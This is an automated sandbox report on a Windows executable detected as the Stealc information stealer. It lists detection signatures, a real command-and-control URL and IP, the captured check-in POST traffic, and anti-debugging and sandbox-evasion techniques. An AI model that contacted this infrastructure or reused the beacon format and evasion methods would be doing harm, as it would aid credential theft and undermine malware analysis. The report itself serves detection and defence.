Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1539396
MD5:e146f5225dc59d28304d4ea38a3c1265
SHA1:f8b22e7a65737087d98f2991180ce701b4140db3
SHA256:6220e540efb2808a44871e88bc3624ad976feb663c6c445e71e6da8be8695f2a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E146F5225DC59D28304D4EA38A3C1265)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5492JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5492JoeSecurity_StealcYara detected StealcJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.8b0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-22T16:11:56.055353+020020442431Malware Command and Control Activity Detected192.168.2.949706185.215.113.3780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Source: 0.2.file.exe.8b0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Source: file.exeReversingLabs: Detection: 44%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_008BC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_008B9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_008B7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_008B9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_008C8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_008BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_008BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_008BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_008C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008B16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_008BBE70

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 45 38 30 34 42 35 46 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="hwid"74E804B5FD762778904926------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="build"doma------CGCFIIEBKEGHJJJJJJDA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_008B4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 45 38 30 34 42 35 46 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="hwid"74E804B5FD762778904926------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="build"doma------CGCFIIEBKEGHJJJJJJDA--
                Source: file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
                Source: file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
                Source: file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
                Source: file.exe, 00000000.00000002.1528463246.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpjZr
                Source: file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpt
                Source: file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
                Source: file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37N

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C80_2_00C739C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA89320_2_00BA8932
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7813D0_2_00C7813D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7D2050_2_00C7D205
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C722200_2_00C72220
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF8B500_2_00CF8B50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6C3110_2_00B6C311
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7ECCE0_2_00C7ECCE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D73C440_2_00D73C44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C74C130_2_00C74C13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C79C310_2_00C79C31
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C695F40_2_00C695F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C085B00_2_00C085B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B596D20_2_00B596D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C766B30_2_00C766B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6FE5C0_2_00C6FE5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7B7B90_2_00C7B7B9
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 008B45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: pqeyqbvq ZLIB complexity 0.9948731219259146
                Source: file.exe, 00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_008C8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_008C3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\D5YE1TEQ.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT url FROM urls LIMIT 10009;
                Source: file.exeReversingLabs: Detection: 44%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1821696 > 1048576
                Source: file.exeStatic PE information: Raw size of pqeyqbvq is bigger than: 0x100000 < 0x196a00

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.8b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pqeyqbvq:EW;oscgfsnm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pqeyqbvq:EW;oscgfsnm:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008C9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cb443 should be: 0x1caf11
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: pqeyqbvq
                Source: file.exeStatic PE information: section name: oscgfsnm
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D530F5 push ebp; mov dword ptr [esp], ecx0_2_00D535AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF18E8 push 6417CE30h; mov dword ptr [esp], eax0_2_00CF192B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31092 push 5A3FADBDh; mov dword ptr [esp], eax0_2_00D3136D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7389B push 64791129h; mov dword ptr [esp], esp0_2_00D738EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3789E push 65038CA3h; mov dword ptr [esp], edx0_2_00D378B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8B8AA push edx; mov dword ptr [esp], 69BC106Fh0_2_00C8B8BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D110B3 push 17F702ABh; mov dword ptr [esp], ecx0_2_00D110CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D518BE push edi; mov dword ptr [esp], esi0_2_00D52299
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2C857 push esi; mov dword ptr [esp], ebx0_2_00D2C878
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2C857 push ebx; mov dword ptr [esp], ebp0_2_00D2C8D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2C857 push ecx; mov dword ptr [esp], esi0_2_00D2C8F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4B858 push ebp; mov dword ptr [esp], 7DAF0DA4h0_2_00D4B944
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CB035 push ecx; ret 0_2_008CB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2E00B push ecx; mov dword ptr [esp], 76874402h0_2_00D2E103
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7F038 push edi; mov dword ptr [esp], esi0_2_00D7F0E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8A841 push 0144C339h; mov dword ptr [esp], ebp0_2_00B8A8F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8A841 push 21667DD7h; mov dword ptr [esp], edi0_2_00B8A90F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8A841 push 2D246ADEh; mov dword ptr [esp], ebx0_2_00B8A972
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8A841 push 7F8A3308h; mov dword ptr [esp], edx0_2_00B8A9CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C9A9C5 push ecx; mov dword ptr [esp], esi0_2_00C9A9C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C9A9C5 push 14C8DF79h; mov dword ptr [esp], ebx0_2_00C9AA00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push ebp; mov dword ptr [esp], esi0_2_00C739DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push 5994B9F2h; mov dword ptr [esp], esi0_2_00C73AF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push 30BA9900h; mov dword ptr [esp], eax0_2_00C73AFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push 112720F4h; mov dword ptr [esp], edx0_2_00C73C0B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push edx; mov dword ptr [esp], 2324EDBBh0_2_00C73C25
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push edx; mov dword ptr [esp], eax0_2_00C73C8C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push 754BCBBBh; mov dword ptr [esp], edx0_2_00C73D45
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push ecx; mov dword ptr [esp], eax0_2_00C73E94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push edx; mov dword ptr [esp], ecx0_2_00C73F2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C739C8 push edx; mov dword ptr [esp], edi0_2_00C73FC2
                Source: file.exeStatic PE information: section name: pqeyqbvq entropy: 7.953729049995973

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008C9860

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13655
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12082 second address: B1208E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F6398F5B496h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1208E second address: B120A8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F6398F5EC9Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11987 second address: B11999 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6398F5B496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F6398F5B496h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84B90 second address: C84BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6398F5ECA1h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84BAD second address: C84BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84BB1 second address: C84BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6398F5ECA1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83B7F second address: C83B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83D1C second address: C83D26 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6398F5EC9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
